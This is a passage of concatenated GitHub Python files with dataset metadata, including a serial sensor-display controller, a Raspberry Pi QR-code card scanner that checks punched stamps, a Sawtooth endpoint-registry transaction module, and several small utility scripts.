self.loss_log[loss_name] = loss_layer(adj, anext, s_l)\n if log:\n self.log['a'] = anext.cpu().numpy()\n return xnext, 
anext\n\n","repo_name":"Shen-Lab/GraphCL","sub_path":"semisupervised_MNIST_CIFAR10/finetuning/layers/tensorized/dense_diffpool_layer.py","file_name":"dense_diffpool_layer.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":484,"dataset":"github-code","pt":"81"} +{"seq_id":"33676520978","text":"\"\"\"\nDisplay controller\nOutputs control characters for the display along with sensor data\n\nSetup needs to have measurements with the labels DO and TEMP\n\nBased on the 8210 basic program below:\n\n10 OPEN \"TERM:\" nowait\n15 If Err then goto 100\n20 Control 1\n30 Control 11,1200\n35 a = DO\n36 b = TEMP\n37 Print 14$;48$;49$;3$;68$;79$;13$;15$;48$;49$;3$;\n38 Sleep 2\n40 Print 14$;48$;49$;3$;a!3!2;13$;15$;48$;49$;3$;\n42 Sleep 15\n45 ' ON|addr|addr|etx|data stuff|CR|off|addr|addr|etx\n46 Print 14$;48$;49$;3$;84$;69$;77$;80$;13$;15$;48$;49$;3$;\n47 Sleep 2\n48 Print 14$;48$;49$;3$;b!3!2;13$;15$;48$;49$;3$;\n50 Close\n60 stop\n100 open \"DISPLAY:\" nowait\n105 Control 1\n110 Print \"TERM BUSY\"; : Sleep 2\n115 Control 2 : Close\n120 goto 10\n\n\nBased on the comments ON|addr|addr|etx|data stuff|CR|off|addr|addr|etx\n it appears we are writing to the same 'address' of the display\n First, we write the sensor name \"DO\", then we wait 2 sec\n Next, we write the actual sensor reading for \"DO\" (presumably dissolved oxygen), wait 15 sec\n After that, we write the sensor name \"TEMP\", and wait 2 sec\n Next, we write the actual sensor reading for temperature and wait 15 seconds\n\nPython does not print literals in decimal like basic. Python uses hex.\nSo, the literal values (e.g. '14$') were translated to hex ('\\x0E').\nTranslation table:\nON\n14$ = \\x0E\n\naddr\n48$ = \\x30\n49$ = \\x31\n\nETX\n3$ = \\x03\n\ndata stuff\n68$ = 'D'\n79$ = 'O'\n\n84$ = 'T'\n69$ = 'E'\n77$ = 'M'\n80$ = 'P'\n\nCR\n13$ = \\x0D\n\nOFF\n$15 = \\x0F`\n\"\"\"\n\nfrom sl3 import *\nimport serial\nimport utime\n\nstart_sequence = '\\x0E\\x30\\x31\\x03' # ON|addr|addr|etx\nend_sequence = '\\x0D\\x0F\\x30\\x31\\x03' # CR|off|addr|addr|etx\n\n\n@TASK\ndef display_SO2245():\n\n # get the sensor readings\n do_reading = measure(\"DO\").value\n temp_reading = measure(\"TEMP\").value\n\n with serial.Serial(\"RS232\", 1200) as output:\n # write 'DO'\n output.write(start_sequence)\n output.write('DO')\n output.write(end_sequence)\n utime.sleep(2)\n\n # write the value of the DO sensor\n output.write(start_sequence)\n output.write(\"{:.{}f}\".format(do_reading, 2)) # 2 is the number of right digits\n output.write(end_sequence)\n utime.sleep(15)\n\n # write 'TEMP'\n output.write(start_sequence)\n output.write('TEMP')\n output.write(end_sequence)\n utime.sleep(2)\n\n # write the value of the TEMP sensor\n output.write(start_sequence)\n output.write(\"{:.{}f}\".format(temp_reading, 2)) # 2 is the number of right digits\n output.write(end_sequence)\n utime.sleep(15)\n\n output.flush() # needed to make sure all the data is sent before closing the port.\n","repo_name":"mgsorokin/XLink500","sub_path":"projects/Display_SO2245/Display_SO2245.py","file_name":"Display_SO2245.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31972104696","text":"import json\n\ndef classify_deployed(file_name, classes):\n payload = None\n with open(file_name, 'rb') as f:\n payload = f.read()\n payload = bytearray(payload)\n runtime_client = boto3.client('runtime.sagemaker')\n response = 
runtime_client.invoke_endpoint(EndpointName = \"image-classification-2020-12-14-00-17-31-761\",ContentType = 'application/x-image',Body = payload)\n result = json.loads(response['Body'].read())\n print(f\"Image is {classes[np.argmax(result)]}\")\n\nclassify_deployed(\"./pearl-5.jpg\",[\"mona-lisa\",\"pearl\"])","repo_name":"mariyamkhalid/cp-sagemaker-endpoint","sub_path":"test_endpoint.py","file_name":"test_endpoint.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18820850714","text":"from main.models import LinksModel\n\nnavbar_dict = {\n 'index': 'Home',\n 'bio_veles': 'Bio',\n 'media': 'Gallery',\n 'repertoire': 'Repertoire',\n 'contacts': 'Contacts',\n}\n\n\nclass LinksAndTitleMixin:\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['links'] = LinksModel.objects.all()\n context['navbar_dict'] = navbar_dict\n return context\n","repo_name":"PavelCyargeenka/duo_veles","sub_path":"duo_veles/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1448688227","text":"#!/usr/bin/python3\n\n# reinstall\n# sudo apt install python3-opencv\n# pip3 install pyzbar\n# sudo apt install python-zbar\n# pip3 install imutils\n# pip3 install paho-mqtt\n# sudo apt install python3-picamera\n\nimport time\n\ntime_last_debug_picture_saved = 0\ntime_script_started = time.time() #to terminate script after some time to prevent possible hang up of hard or software\n\n\nimport cv2\nfrom pyzbar import pyzbar\nimport imutils\nfrom imutils.video import VideoStream\nimport paho.mqtt.publish as publish\nimport hashlib\nimport json\nimport argparse\nimport requests #pip3 install requests\nimport logging\nfrom pathlib import Path\nimport numpy as np\n\n\nlogging.basicConfig(format=\"%(asctime)-15s %(levelname)-8s %(message)s\")\nlogger = logging.getLogger(\"QR-Code Scanner\")\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"security_str\", help=\"A string to securely calculate the md5sum.\")\nparser.add_argument(\"-v\", \"--verbosity\", help=\"increase output verbosity\", default=0, action=\"count\")\nparser.add_argument(\"--no-pushover\", help=\"if set, not pushover messages will be send.\", action='store_true')\nargs = parser.parse_args()\nlogger.setLevel(logging.WARNING-(args.verbosity*10 if args.verbosity <=2 else 20) )\n\nlogger.info(\"Verbosity min. 
at info level.\")\n\n\n# floodfill like function\ndef find_components(arr):\n res = []\n dx,dy = [1,0,-1,0],[0,-1,0,1]\n N,M = arr.shape\n seen = np.zeros((N,M))\n for i in range(N):\n for j in range(M):\n if not seen[i][j] and arr[i][j]:\n todo=[(i,j)]\n seen[i][j] = 1\n cnt=0\n extreme_position = {'x':[i,i], 'y':[j,j]} #'x':min..max, 'y':min..max\n while todo:\n x,y = todo.pop()\n cnt = cnt+1\n for dX, dY in zip(dx,dy):\n X=x+dX\n Y=y+dY\n if X>=0 and X<N and Y>=0 and Y<M and not seen[X][Y] and arr[X][Y]:\n todo.append((X,Y))\n seen[X][Y] = 1\n if X>extreme_position['x'][1]: extreme_position['x'][1]=X\n if X<extreme_position['x'][0]: extreme_position['x'][0]=X\n if Y>extreme_position['y'][1]: extreme_position['y'][1]=Y\n if Y<extreme_position['y'][0]: extreme_position['y'][0]=Y\n res.append({'pos':(i,j),'N_pixels':cnt,'extreme_position':extreme_position,\n 'width':extreme_position['x'][1]-extreme_position['x'][0],\n 'height':extreme_position['y'][1]-extreme_position['y'][0]})\n return res\n\n\n##\nif not args.no_pushover:\n r = requests.post(\"https://api.pushover.net/1/messages.json\", data = {\n \"token\": \"...\", #APP key\n \"user\": \"uTGmV4oeANh23KMHAuwK3CHwupRRVK\",\n \"message\": 'Die Software wurde gerade neugestartet.',\n \"priority\": 1,\n \"title\": \"Neustart\"\n })\n logger.info(r.text)\n logger.info(\"data send to pushover\")\n\n##\n\n# initialize video stream\nvideo_width = 1920\nvideo_height = 1440\npage_width=148 #*mm #final page after cut\npage_height=148 #*mm #final page after cut\nqr_code_size = 60 #*mm\n\nvs = VideoStream(usePiCamera = True, resolution=(video_width, video_height) ).start()\nlogger.debug(\"wait for camera to adapt\")\ntime.sleep(5)\nlast_frame = vs.read()\n\nlogger.info(\"Script completed initialisation.\")\n#while (time.time() - time_script_started < 60*60*24): #terminate after 24 hours of runtime\ncontinue_loop = True\nwhile continue_loop:\n #oben weiß\n publish.single(\"homie/qrscanner/message\", \"Lege die Laufkarte ein.\", hostname=\"localhost\")\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,255,255]]*15 + [[0,0,0]]*15 ), hostname=\"localhost\")\n time.sleep(0.5) #spend soem time to make the CPU not heating up too much\n\n # read from camera\n frame = vs.read()\n logger.debug(\"picture taken\")\n loop_diff_test = cv2.subtract(frame, last_frame)\n result = not np.any(loop_diff_test)\n if result is True:\n logger.error(\"picture comparision shows: picture is NOT different comparend to last loop. This means, our camera connection is broken. Terminating.\")\n continue_loop = False\n else:\n logger.debug(\"picture comparision shows: picture is different comparend to last loop. 
Good, our camera is still alive.\")\n last_frame = frame.copy()\n\n # read from a debug file for test purposes only\n# frame = cv2.imread('/home/pi/Pictures/card_0.png', 0) #0 converts it to greyscale\n\n # for better performance, resize the image\n# frame = imutils.resize(frame, width=1200)\n frame_small = imutils.resize(frame, width=540)\n frame_gray = cv2.cvtColor(frame_small, cv2.COLOR_BGR2GRAY)\n if (time.time() - time_last_debug_picture_saved >= 10):\n cv2.imwrite(\"/dev/shm/time_{}.png\".format(round(time.time())), frame_small) #for debug reasons\n time_last_debug_picture_saved = time.time()\n logger.info(\"debug picture saved\")\n\n logger.debug(\"start searching for qr-codes\")\n barcodes = pyzbar.decode(frame_gray)\n\n for barcode in barcodes: #for each barcode found\n cv2.imwrite(\"/home/pi/Pictures/time_{}.png\".format(round(time.time())), frame) #for debugging\n publish.single(\"homie/qrscanner/message\", \"QR-Code gefunden.\", hostname=\"localhost\")\n publish.single(\"homie/qrscanner/sound\", \"qrcodefound.mp3\", hostname=\"localhost\")\n\n barcode_rel_x_pos = (barcode.rect.left+barcode.rect.width/2) / 540\n barcode_rel_y_pos = (barcode.rect.top+barcode.rect.height/2) / (540/video_width*video_height)\n logger.debug(\"QR-Code at position: {:.3f} {:.3f}\".format(barcode_rel_x_pos, barcode_rel_y_pos))\n\n #ideal position at: 0.509 0.459\n if ( ( abs(barcode_rel_x_pos-0.51) > 0.1 ) or ( abs(barcode_rel_y_pos-0.459) > 0.05) ):\n #does not lie in the center, animation towards te center\n publish.single(\"homie/qrscanner/message\", \"Schiebe die Karte in die Mitte des Fachs.\", hostname=\"localhost\")\n publish.single(\"homie/qrscanner/sound\", \"pushtocenter.mp3\", hostname=\"localhost\")\n\n for i in range(3):\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,255,0]]*15 + [[255,255,0]]*15 ), hostname=\"localhost\")\n time.sleep(0.2)\n publish.single(\"homie/qrscanner/light\", json.dumps( [[0,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(0.2)\n\n else: #lies in the middle/center\n publish.single(\"homie/qrscanner/message\", \"Die Karte liegt richtig.\", hostname=\"localhost\")\n\n d = None\n try:\n d = json.loads(barcode.data.decode(\"utf-8\"))\n except:\n logger.warning(\"ERROR: QR-Code does not contain a valid JSON string.\")\n\n if 'count' in d:\n expected_sum = hashlib.md5(\"{}{}\".format(args.security_str, d['count']).encode('utf-8')).hexdigest()\n if expected_sum == d['hash']:\n logger.info(\"Valid QR-Code for nr: {}\".format(d['count']))\n\n card_data = {'status': 0, 'time_lastseen': 0}\n\n my_filename = '/home/pi/cards/{}.json'.format(d['count'])\n my_file = Path(my_filename)\n if my_file.exists():\n logger.info(\"card info file already existing. attempt to read it.\")\n with open(my_filename,'r') as r:\n try:\n card_data = json.load(r)\n logger.info(\"card info successfully read from file.\")\n except:\n logger.warning(\"error while reading the card file\")\n\n if card_data['status'] == 1:\n publish.single(\"homie/qrscanner/message\", \"Die Laufkarte wurde bereits eingelöst.\", hostname=\"localhost\")\n publish.single(\"homie/qrscanner/sound\", \"cardnotvalid.mp3\", hostname=\"localhost\")\n logger.warning(\"according to card info, this card is not valid any longer for redeem. 
Waitung for 1 seconds.\")\n for i in range(3):\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(.2)\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,255,0]]*30 ), hostname=\"localhost\")\n time.sleep(.2)\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(1)\n\n else:\n cv2.imwrite(\"/home/pi/Pictures/card_top_{}.png\".format(d['count']), frame) # for later analysis\n\n publish.single(\"homie/qrscanner/message\", \"2. Bild mit den Stanzungen machen...\", hostname=\"localhost\")\n\n #prepare picture\n publish.single(\"homie/qrscanner/light\", json.dumps( [[0,255,0]]*15 + [[255,0,0]]*15 ), hostname=\"localhost\")\n time.sleep(1) #spend some time to let the camera adapt\n frame_bottom = vs.read() #take a picture\n logger.debug(\"2nd picture taken with additional light from bottom\")\n cv2.imwrite(\"/home/pi/Pictures/card_bottom_{}.png\".format(d['count']), frame_bottom) # for later analysis\n\n frame_bottom_small = imutils.resize(frame_bottom, width=540)\n\n publish.single(\"homie/qrscanner/message\", \"Stanzungen werden überprüft...\", hostname=\"localhost\")\n\n #begin analysis\n logger.info(\"Barcode read: {}\".format(barcode))\n\n barcode_rel_x_pos = (barcode.rect.left+barcode.rect.width/2) / video_width\n barcode_rel_y_pos = (barcode.rect.top+barcode.rect.height/2) / video_height\n\n img = frame_bottom_small\n rows,cols,ch = img.shape\n\n scale_factor = 540/4*3/page_width #540 = width of image, 4/3 aspect ratio of image\n margin = 0\n pts1 = np.float32(barcode.polygon)\n pts2 = np.float32([\n [(page_width/2-qr_code_size/2)*scale_factor+margin, (page_width/2-qr_code_size/2+margin)*scale_factor],\n [(page_width/2-qr_code_size/2)*scale_factor+margin, (page_width/2+qr_code_size/2-margin)*scale_factor],\n [(page_width/2+qr_code_size/2)*scale_factor-margin, (page_width/2+qr_code_size/2-margin)*scale_factor],\n [(page_width/2+qr_code_size/2)*scale_factor-margin, (page_width/2-qr_code_size/2+margin)*scale_factor]\n ])\n\n M = cv2.getPerspectiveTransform(pts1,pts2)\n\n dst = cv2.warpPerspective(img,M,(405,405))\n dst_top = cv2.warpPerspective(frame_small,M,(405,405))\n \n red = dst.copy()\n # set green and blue channels to 0\n red[:, :, 0] = 0\n red[:, :, 1] = 0\n\n green = dst.copy()\n # set red and blue channels to 0\n green[:, :, 0] = 0\n green[:, :, 2] = 0\n\n # compute difference: red-green\n green_to_red = green.copy()\n #shift the green part into the red channel\n green_to_red[:, :, 2] = green_to_red[:, :, 1]\n difference = cv2.subtract(red, green_to_red)\n\n\n #check the light from behind in the region of the qr code:\n # to determine the threshold for the Binary conversion, read \n # the threshold from the center part of the image and the total\n # center part:\n cv2.imwrite(\"/dev/shm/last_warp_red_mask.png\",red[120:300, 120:300])\n hist = cv2.calcHist([difference[120:300, 120:300]], [2], None, [256], [0,256])\n my_thres = 255\n for i in range(256):\n if hist[255-i] < 1: #below some small arbitrary threshold\n my_thres = 255-i\n\n #total image:\n hist_all = cv2.calcHist([difference], [2], None, [256], [0,256])\n my_thres_all = my_thres\n for i in range(my_thres, 256):\n if hist_all[i] > 0: #above some small arbitrary threshold\n my_thres_all = i\n my_thres_all = 100 if my_thres_all < 100 else my_thres_all\n logger.debug(\"mythres: {}, mythres_all: {}\".format(my_thres, my_thres_all))\n\n red_dst = difference[:, :, 2].copy() #convert into single color 
image do not use cvtColor as it lower intensity on reds: #cv2.cvtColor(red, cv2.COLOR_BGR2GRAY); #convert to gray\n # put threshold between my_thres and my_thres_all\n ret3,th3 = cv2.threshold(red_dst,my_thres + (my_thres_all-my_thres)/2,255,cv2.THRESH_BINARY) #cut out the light which still goes through the middle of the card\n th3 [80:320,80:320] = 0 #set the inner part to black\n\n\n dst_masked = dst.copy()\n dst_masked[th3 != 255] = [0,0,0]\n dst_top[th3 == 255] = [0,0,255]\n\n #end of analysis\n\n stamps = find_components(th3)\n number_stamps = 0\n for i in stamps:\n if i['N_pixels'] > 100 and i['N_pixels'] < 1500 and \\\n i['width'] > 10 and i['width'] < 60 and \\\n i['height'] > 10 and i['height'] < 60:\n number_stamps +=1\n logger.info(\"Stamp found: {}\".format(i) )\n else:\n logger.debug(\"Stamp does not match requirements: {}\".format(i) )\n if number_stamps>12: number_stamps=12\n\n v_img = cv2.vconcat([frame_small[0:405 , 0:405], dst_masked])\n cv2.imwrite(\"/dev/shm/last_combined.png\", v_img) #will also be usede for pushover\n\n v_img = cv2.vconcat([\n cv2.hconcat([frame_small[0:405 , 0:405], dst, red, difference]),\n cv2.hconcat([frame_bottom_small[0:405 , 0:405], green, dst_masked, dst_top])])\n cv2.imwrite(\"/dev/shm/last_combined_overview.png\", v_img)\n\n\n\n\n if number_stamps>0:\n card_data['status'] = 1 # set card to be not valid any longer\n publish.single(\"homie/qrscanner/valid\", d['count'], hostname=\"localhost\")\n publish.single(\"homie/qrscanner/message\", \"Laufkarte gültig. Ausgabe!\", hostname=\"localhost\")\n publish.single(\"homie/qrscanner/sound\", \"redeem.mp3\", hostname=\"localhost\")\n\n if not args.no_pushover:\n r = requests.post(\"https://api.pushover.net/1/messages.json\", data = {\n \"token\": \"...\", #APP key\n \"user\": \"uTGmV4oeANh23KMHAuwK3CHwupRRVK\",\n \"message\": '''<p>Gültiger QR-Code-Scan</p>\n <p>count: {}</p>\n <a href=\"https://www.eue-turnt.de/schild/PushoverFeedback.php?count={}&hash={}\">Erlauben? Dann hier drücken.</a>'''.format(d['count'], d['count'], d['hash']),\n \"priority\": 2,\n \"html\": 1,\n \"expire\": 60,\n \"retry\": 30,\n \"sound\": \"persistent\",\n \"title\": \"Neue Laufkarte\"\n },\n files = {\n \"attachment\": (\"last_combined_overview.png\", open(\"/dev/shm/last_combined_overview.png\", \"rb\"), \"image/png\")\n })\n logger.info(r.text)\n logger.info(\"data send to pushover\")\n\n for i in range(5):\n publish.single(\"homie/qrscanner/light\", json.dumps( [[0,255,0]]*30 ), hostname=\"localhost\")\n time.sleep(0.2)\n publish.single(\"homie/qrscanner/light\", json.dumps( [[0,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(0.2)\n logger.info(\"Grünes Licht eingeschaltet. Jetzt Ausgabe.\")\n publish.single(\"homie/qrscanner/light\", json.dumps( [[0,255,0]]*30 ), hostname=\"localhost\")\n time.sleep(1.0)\n else:\n logger.info(\"Rotes Blink-Licht wird eingeschaltet, da keine Stanzungen gefunden.\")\n publish.single(\"homie/qrscanner/message\", \"Keine Stanzungen gefunden. Fehler? 
Schreibe uns!\", hostname=\"localhost\")\n publish.single(\"homie/qrscanner/sound\", \"nostampsfound.mp3\", hostname=\"localhost\")\n for i in range(3):\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(.2)\n publish.single(\"homie/qrscanner/light\", json.dumps( [[0,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(.2)\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(1)\n\n\n card_data['time_lastseen'] = time.time()\n with open(my_filename, 'w') as outfile:\n json.dump(card_data, outfile)\n logger.info(\"card info written to file: {}\".format(my_filename))\n\n time.sleep(2.0)\n else:\n logger.info(\"Invalid data scanned: {}\".format( barcode.data.decode(\"utf-8\") ))\n publish.single(\"homie/qrscanner/message\", \"Ungültiger QR-Code auf Laufkarte.\", hostname=\"localhost\")\n\n\n\ncv2.destroyAllWindows()\nvs.stop()\n\nlogger.info(\"Script terminated. Total runtime: {:.2f} min\".format( (time.time()-time_script_started)/60 ) )\n\n","repo_name":"pbotte/eue-turnt","sub_path":"automat-v2/qr-scanner.py","file_name":"qr-scanner.py","file_ext":"py","file_size_in_byte":16674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19353855380","text":"import json\nfrom common import ioi_hash\nimport argparse\n\n# This script isn't the best way to do this, but it works.\n# It would have been better to check which LOCRs had paths and then check if they had any LINE dependencies.\n# But I have no way of doing that in this repository.\n\nparser = argparse.ArgumentParser(description=\"Bruteforce LINE paths\")\nparser.add_argument('-o', '--output', type=str, default=\"new_line_paths.txt\", help=\"Output file name. 
Defaults to new_line_paths.txt.\")\nargs = parser.parse_args()\n\nwith open(\"paths\\\\LOCR.json\", \"r\") as f:\n locr_data = json.load(f)\n\nwith open(\"paths\\\\LINE.json\", \"r\") as f:\n line_data = json.load(f)\n\nfound = []\n\nfor locr_entry in locr_data:\n locr_base_path = locr_entry[\"path\"].rsplit('].', 1)[0]\n\n for line_entry in line_data:\n if \"hint\" in line_entry and line_entry[\"path\"] == \"\":\n line_path = f\"{locr_base_path}?/{line_entry['hint']}.sweetline].pc_sweetline\"\n line_path_old_style = f\"{locr_base_path}?{line_entry['hint']}.sweetline].pc_sweetline\"\n\n if ioi_hash(line_path) == line_entry[\"hash\"]:\n found.append(f\"{line_entry['hash']}.LINE,{line_path}\")\n elif ioi_hash(line_path_old_style) == line_entry[\"hash\"]:\n found.append(f\"{line_entry['hash']}.LINE,{line_path_old_style}\")\n\nwith open(args.output, \"w\") as f:\n for item in found:\n f.write(f\"{item}\\n\")\n","repo_name":"glacier-modding/Hitman-Hashes","sub_path":"scripts/bruteforce_line_paths.py","file_name":"bruteforce_line_paths.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23800223636","text":"import logging\n\nfrom journal import transaction, global_store_manager\nfrom journal.messages import transaction_message\n\nlogger = logging.getLogger(__name__)\n\n\ndef register_transaction_types(ledger):\n \"\"\"Registers the endpoint registry asset types on the ledger.\n\n Args:\n ledger (journal.journal_core.Journal): The ledger to register\n the transaction type against.\n \"\"\"\n ledger.register_message_handler(\n EndpointRegistryTransactionMessage,\n transaction_message.transaction_message_handler)\n ledger.add_transaction_store(EndpointRegistryTransaction)\n\n\nclass EndpointRegistryTransactionMessage(\n transaction_message.TransactionMessage):\n \"\"\"Endpoint registry transaction messages represent endpoint registry\n transactions.\n\n Attributes:\n MessageType (str): The class name of the message.\n Transaction (EndpointRegistryTransaction): The transaction the\n message is associated with.\n \"\"\"\n MessageType = \"/ledger.transaction.EndpointRegistry/Transaction\"\n\n def __init__(self, minfo={}):\n super(EndpointRegistryTransactionMessage, self).__init__(minfo)\n\n tinfo = minfo.get('Transaction', {})\n self.Transaction = EndpointRegistryTransaction(tinfo)\n\n\nclass Update(object):\n \"\"\"Updates represent potential changes to the endpoint registry.\n\n Attributes:\n KnownVerbs (list): A list of possible update actions.\n Verb (str): The action of this update, defaults to 'reg'.\n Domain (str): The domain of the endpoint.\n Name (str): The name of the endpoint.\n NodeIdentifier (str): The identifier of the endpoint.\n NetHost (str): The hostname or IP address of the endpoint.\n NetPort (int): The port number of the endpoint.\n \"\"\"\n KnownVerbs = ['reg', 'unr']\n\n @staticmethod\n def create_from_node(node, domain='/'):\n \"\"\"Creates a new Update object based on the attributes of a\n node.\n\n Args:\n node (Node): The node to create an endpoint registry update\n object based on.\n domain (str): The domain of the endpoint.\n\n Returns:\n Update: An update object for registering the node's details.\n \"\"\"\n update = Update()\n\n update.Verb = 'reg'\n update.Domain = domain\n update.Name = node.Name\n update.NodeIdentifier = node.Identifier\n update.NetHost = node.NetHost\n update.NetPort = node.NetPort\n\n return update\n\n def __init__(self, minfo={}):\n 
\"\"\"Constructor for Update class.\n\n Args:\n minfo (dict): Dictionary of values for update fields.\n \"\"\"\n self.Verb = minfo.get('Verb', 'reg')\n\n self.Domain = minfo.get('Domain', '/')\n self.Name = minfo.get('Name', 'unknown')\n self.NodeIdentifier = minfo.get('NodeIdentifier', '')\n self.NetHost = minfo.get('NetHost', '0.0.0.0')\n self.NetPort = minfo.get('NetPort', 0)\n\n def __str__(self):\n return \"({0} {1} {2} {3} {4}:{5})\".format(\n self.Verb, self.NodeIdentifier, self.Name, self.Domain,\n self.NetHost, self.NetPort)\n\n def is_valid(self, store, originatorid):\n \"\"\"Determines if the update is valid.\n\n Args:\n store (dict): Transaction store mapping.\n originatorid (str): Node identifier of transaction originator.\n \"\"\"\n logger.debug('check update %s from %s', str(self), originatorid)\n\n # if the asset exists then the node must be the same as the transaction\n # originator\n if (self.NodeIdentifier in store\n and self.NodeIdentifier != originatorid):\n return False\n\n # check for an attempt to change owner of a non-existant asset\n if self.Verb == 'unr' and self.NodeIdentifier not in store:\n return False\n\n return True\n\n def apply(self, store):\n \"\"\"Applies the update to the asset in the transaction store.\n\n Args:\n store (dict): Transaction store mapping.\n \"\"\"\n logger.debug('apply %s', str(self))\n\n if self.Verb == 'reg':\n store[self.NodeIdentifier] = {\n 'Name': self.Name,\n 'Domain': self.Domain,\n 'NodeIdentifier': self.NodeIdentifier,\n 'Host': self.NetHost,\n 'Port': self.NetPort\n }\n elif self.Verb == 'unr':\n del store[self.NodeIdentifier]\n else:\n logger.info('unknown verb %s', self.Verb)\n\n def dump(self):\n \"\"\"Returns a dict with attributes from the update object.\n\n Returns:\n dict: A dictionary containing attributes from the update\n object.\n \"\"\"\n result = {\n 'Verb': self.Verb,\n 'Domain': self.Domain,\n 'Name': self.Name,\n 'NodeIdentifier': self.NodeIdentifier,\n 'NetHost': self.NetHost,\n 'NetPort': self.NetPort\n }\n return result\n\n\nclass EndpointRegistryTransaction(transaction.Transaction):\n \"\"\"A Transaction is a set of updates to be applied atomically\n to a ledger.\n\n It has a unique identifier and a signature to validate the source.\n\n Attributes:\n TransactionTypeName (str): The name of the endpoint registry\n transaction type.\n TransactionStoreType (type): The type of the transaction store.\n MessageType (type): The object type of the message associated\n with this transaction.\n Updates (list): A list of endpoint registry updates associated\n with this transaction.\n \"\"\"\n TransactionTypeName = '/EndpointRegistryTransaction'\n TransactionStoreType = global_store_manager.KeyValueStore\n MessageType = EndpointRegistryTransactionMessage\n\n @staticmethod\n def create_from_node(node, domain='/'):\n \"\"\"Creates a new EndpointRegistryTransaction object based on\n the attributes of a node.\n\n Args:\n node (Node): The node to create an endpoint registry update\n object based on.\n domain (str): The domain of the endpoint.\n\n Returns:\n Update: A transaction contiaining an update for\n registering the node's details.\n \"\"\"\n regtxn = EndpointRegistryTransaction()\n regtxn.Updates.append(Update.create_from_node(node, domain))\n\n return regtxn\n\n def __init__(self, minfo={}):\n super(EndpointRegistryTransaction, self).__init__(minfo)\n\n self.Updates = []\n\n if 'Updates' in minfo:\n for update in minfo['Updates']:\n self.Updates.append(Update(update))\n\n def __str__(self):\n return \" and 
\".join([str(u) for u in self.Updates])\n\n def is_valid(self, store):\n \"\"\"Determines if the transaction is valid.\n\n Args:\n store (dict): Transaction store mapping.\n\n Returns:\n bool: Whether or not the transaction is valid.\n \"\"\"\n if not super(EndpointRegistryTransaction, self).is_valid(store):\n return False\n\n for update in self.Updates:\n if not update.is_valid(store, self.OriginatorID):\n logger.debug('invalid transaction: %s', str(update))\n return False\n\n return True\n\n def apply(self, store):\n \"\"\"Applies all the updates in the transaction to the endpoint\n in the transaction store.\n\n Args:\n store (dict): Transaction store mapping.\n \"\"\"\n for update in self.Updates:\n update.apply(store)\n\n def dump(self):\n \"\"\"Returns a dict with attributes from the transaction object.\n\n Returns:\n dict: The updates from the transaction object.\n \"\"\"\n result = super(EndpointRegistryTransaction, self).dump()\n\n result['Updates'] = []\n for update in self.Updates:\n result['Updates'].append(update.dump())\n\n return result\n","repo_name":"nikileshsa/sawtooth-core","sub_path":"ledger/transaction/endpoint_registry.py","file_name":"endpoint_registry.py","file_ext":"py","file_size_in_byte":8014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31375874262","text":"import cv2\r\nfrom darknet_images import *\r\n\r\n\r\nargs = parser()\r\ncheck_arguments_errors(args)\r\n\r\nrandom.seed(3) # deterministic bbox colors\r\nnetwork, class_names, class_colors = darknet.load_network(\r\n args.config_file,\r\n args.data_file,\r\n args.weights,\r\n batch_size=args.batch_size\r\n)\r\n","repo_name":"jeffreypaul15/FinalYearProject","sub_path":"back_end/server_code/test_file.py","file_name":"test_file.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6283581337","text":"#2X3 lük bir A matrisi oluşturun\n#3X2 lük bir B matrisi oluşturun\n\n#A ve B matrislerin çarpımını bir C matrisine eşitleyin\n\nimport numpy as np\n\nmatrisA = np.array([[1,2,3],\n [4,5,6]])\n\nmatrisB = np.array([[7,8],\n [9,10],\n [10,11]])\n\nmatrisC = np.dot(matrisA,matrisB)\nprint(matrisC)","repo_name":"Kadir-Akipek/DataSciencePython","sub_path":"DataScience/Numpy/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74959742986","text":"import os\r\nimport discord\r\nfrom discord.ext import commands\r\nfrom discord.utils import find\r\nfrom __main__ import send_cmd_help\r\nimport random, time, datetime\r\nimport aiohttp\r\nimport asyncio\r\nimport re, operator\r\nimport urllib.request\r\ntry:\r\n from bs4 import BeautifulSoup\r\nexcept:\r\n raise RuntimeError(\"bs4 required: pip install beautifulsoup4\")\r\nfrom .utils.dataIO import fileIO\r\nfrom cogs.utils import checks\r\nimport logging\r\n\r\nprefix = fileIO(\"data/red/settings.json\", \"load\")['PREFIXES'][0]\r\nhelp_msg = [\r\n \"**No linked account (`{}osuset user [username]`) or not using **`{}command [username] [gamemode]`\".format(prefix, prefix),\r\n \"**No linked account (`{}osuset user [username]`)**\".format(prefix)\r\n ]\r\nmodes = [\"osu\", \"taiko\", 